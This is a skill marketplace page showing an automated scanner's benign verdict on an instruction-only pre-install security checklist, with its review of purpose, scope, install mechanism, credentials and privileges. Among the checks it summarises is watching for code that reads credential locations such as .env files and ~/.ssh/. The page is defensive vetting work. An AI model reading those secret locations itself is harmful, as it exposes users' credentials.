Back to skill
Skillv1.0.0
ClawScan security
Skill Scanner · ClawHub's context-aware review of the artifact, metadata, and declared behavior.
Scanner verdict
BenignMar 16, 2026, 7:55 PM
- Verdict
- Benign
- Confidence
- high
- Model
- gpt-5-mini
- Summary
- The skill is an instruction-only checklist for performing security checks before installing packages; its requirements and instructions are consistent with its stated purpose and it does not request extra privileges or install code.
- Guidance
- This skill is a safe, instruction-only checklist you can use before installing packages. Before you rely on it: ensure the environment where checks run has npm/git if you want the automated commands to work; review any commands the agent would execute (it may run `npm info`, `npm audit`, or inspect package.json); treat the checklist as guidance — it doesn't auto-block installs; and continue to require explicit user approval before running or installing anything flagged as suspicious.
Review Dimensions
- Purpose & Capability
- okName and description match the SKILL.md content: it is a pre-install security checklist for skills/packages. There are no unrelated environment variables, binaries, or installs requested that would be disproportionate to the stated purpose.
- Instruction Scope
- noteThe runtime instructions are advisory (inspect package.json, run `npm info`, `npm audit`, check repos, look for downloads/lifecycle scripts, etc.). This is appropriate for a security checklist. One minor mismatch: the skill expects tools like `npm` and `git` to be available but the metadata does not declare required binaries — that is reasonable given it's instruction-only but worth noting so an operator knows these checks rely on external CLI tools.
- Install Mechanism
- okNo install spec and no code files — lowest-risk category. The skill does not download or execute third-party code itself.
- Credentials
- okThe skill requests no credentials, environment variables, or config paths. Its guidance to look for credential-access patterns (e.g., `.env`, `~/.ssh/`) is appropriate for its purpose rather than an attempt to access them.
- Persistence & Privilege
- okalways is false and the skill is user-invocable. Model invocation is allowed (default) but that is appropriate for a helper skill and not excessive given the skill has no install or credential requests.